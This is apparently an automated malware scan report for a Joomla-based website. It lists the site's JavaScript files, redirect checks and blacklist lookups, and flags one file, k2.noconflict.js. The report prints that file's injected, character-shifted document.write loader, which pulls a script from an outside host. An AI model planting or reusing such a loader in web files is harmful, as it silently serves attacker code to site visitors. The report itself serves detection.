Scanned pages/files
Request | Server response | Status |
http://vdohnova.com/ | 200 OK Content-Length: 26307 Content-Type: text/html | clean |
http://vdohnova.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/modal.js | 200 OK Content-Length: 9732 Content-Type: text/javascript | clean |
http://vdohnova.com//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Not Found Content-Length: 917 Content-Type: text/html | clean |
http://vdohnova.com/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://vdohnova.com/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 528 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var $K2 = jQuery.noConflict(); <!-- js-tools --> q=0;while(q<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00tusjqujttbnbsb/sv0xq.benjo0vtfs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://vdohnova.com/components/com_k2/js/k2.js | 200 OK Content-Length: 6820 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/caption.js | 200 OK Content-Length: 973 Content-Type: text/javascript | clean |
http://vdohnova.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 93826 Content-Type: text/javascript | clean |
http://vdohnova.com/cache/widgetkit/widgetkit-7b0e02cd.js | 200 OK Content-Length: 12848 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/warp.js | 200 OK Content-Length: 6844 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/accordionmenu.js | 200 OK Content-Length: 1526 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/dropdownmenu.js | 200 OK Content-Length: 5421 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/js/template.js | 200 OK Content-Length: 1113 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vdohnova.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 16:48:50 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2d40feb8c7eb14d1d7e2d7061d56e48a=r31t6f9cvtl4845vn90n8262h6; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: vdohnova.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 16:48:50 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2d40feb8c7eb14d1d7e2d7061d56e48a=r31t6f9cvtl4845vn90n8262h6; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: vdohnova.com
Referer: http://www.google.com/search?q=vdohnova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vdohnova.com
Referer: http://www.google.com/search?q=vdohnova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vdohnova.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vdohnova.com/
Result: vdohnova.com is not infected or malware details are not published yet.
Result: vdohnova.com is not infected or malware details are not published yet.